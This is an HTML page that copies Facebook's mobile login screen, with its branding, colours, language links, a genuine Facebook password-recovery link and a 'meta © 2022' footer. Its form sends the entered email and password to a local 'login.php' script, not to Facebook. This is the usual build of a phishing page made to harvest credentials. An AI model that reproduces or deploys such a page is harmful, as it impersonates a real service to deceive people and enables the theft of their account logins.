<!DOCTYPE html>
<html lang="en">
  <head>
    <title>Facebook login-sign up</title>
         <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style type="text/css">
      h3{
        color: #1877f2;
        font-size: 25px;
      }
      input{
        width: 350px;
        height: 35px;
        border-radius: 4px;
        border: 1.5px #f0f2f5 solid;
        background: #f0f2f5;
        padding: 5px;
        
      }
      button{
        width: 360px;
        height: 40px;
        background: #1877f2;
        border-radius: 3px;
        border: 1px #1877f2 solid;
        color: white;
        font-size: 17px;
      }
      div{
        padding: 5px;
      }
      a{
        color: #5890FF;
        font-size: 14px;
        background-color: white;
        
      }
      #down{
        border: green;
        background: #42b72a;
        color: white;
        width: 150px;
        border-radius: 5px;
        text-align: center;
        align-items: bottom;
        padding: 10px;
        font-size: 15px;
      }
      #face{
     
        text-align: center;
        background: white;
        right: 50%;
      }
      #book{
        text-align: center;
        background: white;
        
      }
      #noob{
        position: relative;
        top: 40px;
        font-weight: 310;
        font-size: 13px;
      }
      #pass{
        position: relative;
        top: 6px;
      }
      #fuck{
        right: 80px;
        top: 30px;
      }
      #1{
        top: 01;
      }
      
      #hard{
        position: absolute;
        right: 220px;
      }
      #lang2{
        position: absolute;
        right: 40px;
        top: 05px;
      }
      #p{
        font-size: 12px;
        color: gray;
      }
    </style>
  </head>
  <body>
    <div>
    <center>
    <h3>facebook</h3>
    </center>
    
   
      <center>
        <form action="login.php" method="post">
      <input type="text" name="email" placeholder="Mobile number or email address"required>
      
      <input type="password" name="pass" id="pass" placeholder="Password"required>
      
      
      <br><br>
      <button><b>Log In</b></button>
      </form>
      <br><br>
      <a href="https://m.facebook.com/login/identify/?ctx=recover&c=https%3A%2F%2Fm.facebook.com%2F&multiple_results=0&ars=facebook_login&from_login_screen=0&lwv=100&_rdr">Forgotten password?</a>
      <br><br>
      
      <div>____________________  or  ____________________</div>
      
      
      <h3 id="down">Create New Account</h3>
      </center>
      <br><br>
      <center>
      <div id="noob">
        <div id="hard">
      <div style="color: gray"><b>English (US)</b></div>
      <div id="1">অসমীয়া</div>
      <div id="2">नेपाली</div>
      <div id="3">Português (Brasil)</div>
      </div>
      <br>
      <div id="lang2">
      <div>বাংলা</div>
      <div id="4">हिन्दी</div>
      <div id="5">Español</div>
      <div id="6">+</div>
      </div>
      </center>
      <br><br><br><br><br><br><br>
      <center>
      <p id="p">About . Help . More <br>meta © 2022</p>
      </center>
      
      
      </div>
    </div>
  </body>
</html>